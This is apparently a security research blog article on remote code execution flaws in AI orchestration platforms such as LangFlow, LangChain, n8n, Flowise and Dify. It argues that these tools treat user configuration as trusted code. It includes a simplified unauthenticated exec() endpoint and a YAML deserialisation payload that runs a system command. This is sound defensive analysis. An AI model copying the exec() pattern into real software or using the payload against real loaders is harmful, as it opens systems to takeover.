←Research
Researchsecurity10 min read

LangFlow, n8n and the pattern where AI configuration becomes code execution

AI orchestration platforms like LangFlow and n8n are accumulating critical RCE vulnerabilities because their architectures treat user-supplied configuration as trusted code.

LangFlow shipped a code validation endpoint that ran user input through Python's exec() with no authentication. That is not a simplification. That is literally what CVE-2025-3248 was: a /api/v1/validate/code endpoint, reachable without credentials, that passed arbitrary Python directly into the interpreter. CISA added it to the Known Exploited Vulnerabilities catalogue in May 2025 after confirming active exploitation in the wild. CVSS 9.8.

This would be a straightforward vulnerability write-up if it were an isolated case. It is not. LangFlow, LangChain, n8n and a growing roster of AI orchestration platforms have accumulated a pattern of critical RCE vulnerabilities that share a single architectural root cause: they treat user-supplied configuration as trusted code.

The vulnerability class nobody named

The individual CVEs have names: code injection, unsafe deserialisation, server-side template injection. But these labels obscure the structural problem. AI orchestration platforms are, by design, systems that convert visual drag-and-drop configurations into executable code. A user drags a "Python function" node onto a canvas, types some code into a text box and clicks run. The platform evaluates it.

That is the feature. The vulnerability is that the boundary between "configuration the user is allowed to supply" and "code the platform will execute" is either non-existent or trivially bypassed.

In traditional web applications, this boundary is well understood. User input goes into data fields. Code stays in the application. When input crosses into code (SQL injection, template injection), we call it a vulnerability and we have decades of tooling to prevent it. AI orchestration platforms invert this model. The user input is code. The platform's entire purpose is to execute what the user provides.

The security challenge is not preventing code execution. It is constraining who gets to trigger it, what context it runs in and what it can reach. Every critical CVE in this space represents a failure on one of those three axes.

LangFlow: pre-auth exec() to CISA KEV in six weeks

LangFlow is an open-source visual framework for building LangChain applications. It lets users construct AI workflows by connecting components on a canvas, with custom Python code permitted in various nodes. By early 2025 it had millions of downloads and thousands of production deployments.

CVE-2025-3248 targeted LangFlow's code validation endpoint. The feature was intended to provide syntax checking for user-supplied Python code in workflow nodes. The implementation exposed /api/v1/validate/code, which accepted a POST request containing a Python code string and executed it server-side to check for errors. No authentication was required. No sandboxing was applied.

Horizon3.ai published a detailed exploit analysis showing a trivial path to remote code execution. The request body was a JSON object with a single code field. Anything placed in that field was passed to exec(). An attacker needed nothing more than network access to the LangFlow instance:

# The essence of what the vulnerable endpoint did
def validate_code(code: str):
    try:
        exec(code)  # User-supplied input, no sandbox, no auth
        return {"valid": True}
    except Exception as e:
        return {"valid": False, "error": str(e)}

The actual implementation was marginally more complex, but functionally identical. Horizon3.ai confirmed that reverse shells, file exfiltration and lateral movement were all achievable through a single HTTP request.

Check Point Research documented exploitation attempts beginning within days of the CVE's publication. Huntress published detection guidance noting that exposed LangFlow instances were being scanned at scale. CISA added CVE-2025-3248 to the KEV catalogue on 5 May 2025, requiring federal agencies to patch within three weeks.

The root cause was not a subtle logic error. It was a design choice: the fastest way to validate Python is to run it, so the developers ran it. Authentication was not applied because the endpoint was considered a development utility. Except LangFlow instances were running in production, exposed to the internet, with default configurations that bound to all interfaces.

LangChain: deserialisation as a feature

LangChain, the library that LangFlow wraps into a visual interface, has its own history with this vulnerability class. CVE-2024-46946, published against the langchain_experimental package, allowed arbitrary code execution through the load_prompt() function.

The mechanism was YAML deserialisation. LangChain's prompt loading functionality accepted YAML files containing Python object constructors. A malicious YAML file could instantiate arbitrary Python objects, achieving code execution the moment a prompt template was loaded:

# Malicious prompt file - executes calc.exe on load
!!python/object/apply:os.system
  args: ['calc.exe']

This is not a novel attack. Unsafe YAML deserialisation has been a known vulnerability class since at least 2013, when Ruby on Rails suffered a nearly identical issue. Python's yaml.safe_load() exists specifically to prevent it. LangChain's experimental package used yaml.load() with the full loader, allowing arbitrary object construction.

The langchain_experimental label is doing heavy lifting here. In practice, the experimental package is widely installed because it contains functionality that users need, including tool-calling capabilities and agent executors that are referenced in LangChain's own documentation and tutorials. The "experimental" designation provides legal cover, not security isolation.

Rapid7's analysis of AI data infrastructure vulnerabilities grouped the LangChain and LangFlow issues together, noting that the pattern was consistent: "These tools provide powerful automation capabilities but frequently expose code execution surfaces that lack adequate access controls or input validation."

n8n: when workflow automation meets code execution

n8n is a self-hosted workflow automation platform with a visual editor. It is not marketed as an AI tool specifically, but its integration with LLM APIs and AI services has made it a popular choice for building AI agent workflows. CVE-2025-3455, scored at CVSS 9.8, allowed authenticated users to escalate to arbitrary code execution through n8n's code node.

The code node is an explicit feature: users write JavaScript or Python that runs server-side within their workflows. The vulnerability lay in the execution engine's failure to properly sandbox this code. An authenticated user, even one with limited permissions intended to restrict them to specific workflow operations, could execute arbitrary system commands through the code node.

This is the tension at the heart of all these platforms. n8n needs to let users run code to be useful. The question is whether "authenticated user who can create workflows" should have the privileges of a system administrator. In n8n's case, the answer was effectively yes, regardless of what the role-based access control system suggested.

The pattern extends beyond these three projects. Flowise, another LangChain visual builder, received CVE-2025-26319 (CVSS 9.8) for unauthenticated arbitrary file upload leading to RCE. Dify, a competing LLM application platform, received CVE-2025-29029 for sandbox escape in its code execution feature. The CVEs keep arriving because the underlying architecture keeps producing them.

Configuration as code: the pattern

Strip away the specific CVE numbers and product names, and the pattern resolves into a single architectural decision made repeatedly across the AI orchestration space:

User-supplied configuration is evaluated as executable code in a privileged context.

This manifests differently in each product. In LangFlow, it was exec() behind an unauthenticated endpoint. In LangChain, it was unsafe YAML deserialisation in prompt loading. In n8n, it was insufficient sandboxing of the code execution node. In Flowise, it was unauthenticated file upload to an executable directory. But the underlying trust boundary violation is identical.

Traditional workflow automation tools faced this same problem decades ago. Jenkins, for instance, learned painfully that "pipeline as code" means every user who can edit a Jenkinsfile can execute arbitrary commands on the build server. The solution, imperfect as it is, involved script security plugins, sandbox environments and approval workflows for dangerous operations.

AI orchestration platforms have not absorbed these lessons. They are rebuilding the same execution architecture, with the same trust model failures, in a context where the attack surface is broader (internet-facing by default, integrated with cloud APIs, handling sensitive data) and the user base is less security-aware (data scientists and ML engineers rather than DevOps teams with production system experience).

Why sandboxing keeps failing

The obvious response is to sandbox the code execution. Several of these platforms have tried. The results are instructive.

LangFlow's post-patch approach moved code validation into a restricted execution context. Within weeks, researchers were probing for sandbox escapes. Dify explicitly built a sandbox for its code execution feature, using Docker containers and seccomp profiles. CVE-2025-29029 demonstrated that the sandbox could be escaped through specific Python module imports that were not properly restricted.

The problem is fundamental. A sandbox that prevents all dangerous operations also prevents most useful operations. An AI workflow that cannot make HTTP requests, read files or call APIs is not a useful AI workflow. Every capability that makes the sandbox permissive enough to be functional also makes it permissive enough to be exploitable. The sandbox ends up being a speed bump rather than a boundary.

Google's gVisor and AWS's Firecracker demonstrate that robust sandboxing is possible, but it requires kernel-level isolation, not application-level restrictions. Most AI orchestration platforms implement sandboxing as Python import filtering or JavaScript VM restrictions, both of which have extensive bypass histories.

The exposure surface

Censys and Shodan data consistently shows thousands of LangFlow, n8n and similar platform instances exposed to the internet. Many run default configurations with authentication disabled or set to weak defaults. This is partly a documentation problem (default configs are optimised for local development, not production deployment) and partly a cultural problem (the AI development community prioritises rapid prototyping over operational security).

The combination is corrosive. A platform that executes user-supplied code, deployed with no authentication, exposed to the internet, running with the privileges of whatever service account was convenient during setup. Every component of this stack is a choice, and every choice trends toward the path of least resistance.

The rapid adoption cycle compounds the risk. LangFlow went from a GitHub project to a production dependency in hundreds of organisations within months. Most of those organisations adopted it for its capabilities, not after a security review. By the time CVE-2025-3248 landed in the KEV catalogue, the remediation surface was enormous.

What this means structurally

This is not a story about individual vulnerabilities in individual products. It is a story about an entire class of software that was designed without a coherent security model.

AI orchestration platforms occupy a novel and uncomfortable position in the application stack. They are middleware that executes arbitrary code. They sit between the user (who supplies the configuration) and the infrastructure (where the code runs). They combine the accessibility of a SaaS application with the privileges of a deployment pipeline. And they were built, almost universally, by teams optimising for developer experience rather than operational security.

The vulnerability pattern will continue because the design pattern continues. Every new visual AI workflow builder, every new LLM application framework, every new "build AI agents without code" platform faces the same fundamental question: how do you let users define executable behaviour without giving them unrestricted code execution?

Nobody in this space has answered that question well. The CVEs are the evidence.

The last generation of workflow automation tools took a decade to develop adequate security models, and many still have not. AI orchestration platforms are on year two, growing faster, handling more sensitive data and facing more sophisticated attackers. The vulnerability class that produced CVE-2025-3248 is not a bug to be patched. It is a design philosophy to be replaced. Whether the replacement arrives before the next KEV entry is the question that keeps not getting answered.

Newsletter

One email a week. Security research, engineering deep-dives and AI security insights - written for practitioners. No noise.